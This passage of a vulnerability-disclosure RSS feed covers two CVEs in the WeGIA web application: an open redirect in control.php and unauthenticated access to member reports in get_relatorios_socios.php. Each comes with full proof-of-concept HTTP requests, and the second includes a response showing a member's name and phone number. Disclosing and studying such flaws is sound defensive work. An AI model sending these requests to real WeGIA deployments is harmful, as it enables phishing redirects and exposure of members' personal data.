    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61606</title>
        <link>https://www.cvehunters.com/p/cve-2025-61606/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-61606/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61606-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter&amp;#34;&amp;gt;CVE-2025-61606: Open Redirect Vulnerability in &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An Open Redirect vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application, specifically in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter (metodo=listarUm nomeClasse=FuncionarioControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user input in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61606-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter&amp;#34;&amp;gt;CVE-2025-61606: Open Redirect Vulnerability in &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An Open Redirect vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application, specifically in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter (metodo=listarUm nomeClasse=FuncionarioControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user input in the &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; parameter.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET metodo=listarUm&amp;amp;amp;nomeClasse=FuncionarioControle&amp;amp;amp;nextPage=https%3A%2F%2Fgoogle.com&amp;amp;amp;id_funcionario=2&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;request&amp;#34;&amp;gt;Request:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/controle/control.php?metodo=listarUm&amp;amp;amp;nomeClasse=FuncionarioControle&amp;amp;amp;nextPage=https%3A%2F%2Fgoogle.com&amp;amp;amp;id_funcionario=2 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/funcionario/informacao_funcionario.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: {COOKIE}
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The server accepts the crafted request and successfully redirects the victim to &amp;lt;code&amp;gt;https://google.com&amp;lt;/code&amp;gt; instead of restricting navigation to the application’s own domain.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Phishing: Attackers can trick users into visiting malicious sites that mimic legitimate ones.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Fake login pages can capture user credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware distribution: Victims may be redirected to websites hosting malicious software.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Users may lose trust in the Wegia platform if abused in phishing campaigns.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61665</title>
        <link>https://www.cvehunters.com/p/cve-2025-61665/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-61665/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint&amp;#34;&amp;gt;CVE-2025-61665: Broken Access Control in &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;tipo_socio&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tipo_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;operador&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;valor&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tag&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&amp;amp;amp;tipo_pessoa=x&amp;amp;amp;operador=maior_q&amp;amp;amp;valor=&amp;amp;amp;tag=x&amp;amp;amp;status=x HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;response-snippet&amp;#34;&amp;gt;Response (snippet):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Date: Sun, 31 Aug 2025 20:00:43 GMT
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Server: Apache/2.4.62 (Debian)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Vary: Accept-Encoding
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 204
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Keep-Alive: timeout=5, max=100
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: Keep-Alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;[{
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;nome&amp;amp;#34;: &amp;amp;#34;Luis Barango&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;telefone&amp;amp;#34;: &amp;amp;#34;(71)98642-1278&amp;amp;#34;,
